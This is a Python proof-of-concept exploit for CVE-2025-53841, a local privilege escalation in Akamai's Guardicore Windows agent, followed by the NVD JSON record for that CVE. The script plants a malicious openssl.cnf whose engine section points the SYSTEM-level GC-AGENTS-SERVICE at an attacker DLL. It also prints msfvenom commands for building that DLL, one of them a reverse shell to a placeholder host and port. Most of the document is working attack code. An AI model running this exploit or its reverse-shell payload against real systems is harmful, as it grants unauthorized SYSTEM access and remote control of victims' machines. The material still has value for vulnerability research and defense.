CVE-2025-53841

#!/usr/bin/env python3 """ CVE-2025-53841 PoC - Akamai Guardicore Local Privilege Escalation This PoC creates a malicious OpenSSL configuration file that loads a custom DLL to achieve privilege escalation from low-privileged user to SYSTEM. Author: Security Researcher CVE: CVE-2025-53841 CVSS: 7.8 (High) """ import os import subprocess import sys import ctypes def create_malicious_openssl_config(config_path, dll_path): """ Create a malicious openssl.cnf file that loads a custom DLL via OpenSSL engine functionality. Args: config_path: Path where openssl.cnf will be created dll_path: Path to the malicious DLL to load """ malicious_config = f"""# OpenSSL Configuration File # Malicious config for CVE-2025-53841 openssl_conf = openssl_init default_algorithms = ALL [openssl_init] engines = engine_section [engine_section] dynamic = dynamic_section [dynamic_section] dynamic_path = {dll_path} default_algorithms = ALL """ with open(config_path, 'w') as f: f.write(malicious_config) print(f"[+] Created malicious openssl.cnf at: {config_path}") print(f"[+] DLL path configured: {dll_path}") def get_target_path(): """ Get the target path where GC-AGENTS-SERVICE reads openssl.cnf This path should be writable by standard users """ # Common path where Guardicore Agent looks for openssl.cnf # The actual path may vary based on installation return r"C:\Program Files\Akamai\guardicore\openssldir\openssl.cnf" def create_payload_dll(dll_path): """ Generate a payload DLL that executes commands with SYSTEM privileges In production, use msfvenom to generate: msfvenom -p windows/x64/exec CMD="calc.exe" -f dll -o payload.dll """ print(f"[!] Generate payload DLL using msfvenom:") print(f" msfvenom -p windows/x64/exec CMD='whoami > C:\\\\temp\\\\pwned.txt' -f dll -o {dll_path}") print(f"[!] Or for a reverse shell:") print(f" msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o {dll_path}") def trigger_vulnerability(): """ Trigger the vulnerability by forcing GC-AGENTS-SERVICE to reload configuration This typically happens when the service is restarted or certain operations are performed """ print("[*] Waiting for service restart or configuration reload...") print("[*] The GC-AGENTS-SERVICE will load the malicious openssl.cnf") print("[*] This will execute the DLL with SYSTEM privileges") # In real attack scenario: # 1. Wait for service restart (system update, scheduled task, etc.) # 2. Or trigger via specific Guardicore functionality # 3. Or wait for legitimate service restart def main(): print("=" * 60) print("CVE-2025-53841 - Akamai Guardicore Local Privilege Escalation") print("=" * 60) # Configuration target_path = get_target_path() dll_path = r"C:\temp\evil.dll" # Step 1: Create directory if needed target_dir = os.path.dirname(target_path) if not os.path.exists(target_dir): try: os.makedirs(target_dir) print(f"[+] Created directory: {target_dir}") except PermissionError: print(f"[-] Cannot create directory - may already exist or no permission") # Step 2: Generate payload DLL create_payload_dll(dll_path) # Step 3: Create malicious openssl.cnf create_malicious_openssl_config(target_path, dll_path) # Step 4: Wait for service restart trigger_vulnerability() print("\n[*] PoC completed. In real attack:") print(" 1. Wait for GC-AGENTS-SERVICE restart") print(" 2. Check for successful privilege escalation") print(" 3. Verify SYSTEM-level code execution") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-53841", "sourceIdentifier": "[email protected]", "published": "2025-12-03T15:15:51.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GC-AGENTS-SERVICE running as part of Akamai´s Guardicore Platform Agent for Windows versions prior to v49.20.1, v50.15.0, v51.12.0, v52.2.0 is affected by a local privilege escalation vulnerability. The service will attempt to read an OpenSSL configuration file from a non-existent location that standard Windows users have default write access to. This allows an unprivileged local user to create a crafted \"openssl.cnf\" file in that location and, by specifying the path to a custom DLL file in a custom OpenSSL engine definition, execute arbitrary commands with the privileges of the Guardicore Agent process. Since Guardicore Agent runs with SYSTEM privileges, this permits an unprivileged user to fully elevate privileges to SYSTEM level in this manner."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "references": [{"url": "https://community.akamai.com/customers/s/article/Windows-Agent-Vulnerability-Summary-and-Resolution", "source": "[email protected]"}, {"url": "https://techdocs.akamai.com/guardicore-platform-agent/changelog", "source": "[email protected]"}, {"url": "https://www.akamai.com/blog/security/advisory-cve-2025-53841-guardicore-local-privilege-escalation", "source": "[email protected]"}, {"url": "https://www.tuv.com/landingpage/en/vulnerability-disclosure/", "source": "[email protected]"}]}}